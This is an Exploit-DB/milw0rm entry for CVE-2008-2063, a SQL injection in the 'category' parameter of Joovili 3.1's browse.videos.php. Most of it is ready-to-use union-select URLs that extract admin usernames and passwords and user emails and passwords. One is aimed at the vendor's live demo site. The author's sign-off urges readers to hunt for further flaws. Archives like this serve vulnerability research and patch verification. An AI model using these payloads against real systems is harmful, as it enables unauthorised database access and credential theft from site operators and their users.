Joovili 3.1 browse.videos.php category SQL Injection Vulnerability

2008-04-28T00:00:00
ID EDB-ID:5520
Type exploitdb
Reporter HaCkeR_EgY
Modified 2008-04-28T00:00:00

Description

Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability. CVE-2008-2063. Webapps exploit for php platform

                                        
                                            #####################################################
#                  [-Joovili-]         		    #
#        Rem0te SQL Injection Vulnerability 	    #
#           IN ==> browse.videos.php <==== 	    #
#####################################################
 
[<>]Author: HaCkeR-EgY
 
[<>]H^0mE: WWW.PAL-HACKER.COM , ATSDP.COM
 
[<>]CONTact: hacker_EGY@hotmail.com
================================================
[<>]Script : Joovili
[<>]version : Version 3.1.0
[<>]price :$155 USD
[<>]DOWNL0AD : www.joovili.com
================================================
[<>] D0RK : use your Mind (:
 
[<>] Explo!t :

[<>] 1 ====>http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,user(),7,8,9/**/from/**/joovili_admins/*

[<>] 2 =====>http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email),5,user(),7,8,9/**/from/**/joovili_users/*

[<>] L!Ve DeM0 :
 
====>  http://demo.joovili.com/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,6,7,8,9/**/from/**/joovili_admins/*
 

[<>]N0te :::>> 1- Sometime  Requires to register
               &n bsp;      2- You can Find other Errors
=======================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "
[<>] Greetz : F!resell , Mohamed el Arab , MrExE , H-T Team [ HouSSaMix +
ToXiC350 ] , Gold_M , V4 Team , Jiki Team  , RoMaNcYxHaCkEr , stR0ke

# milw0rm.com [2008-04-28]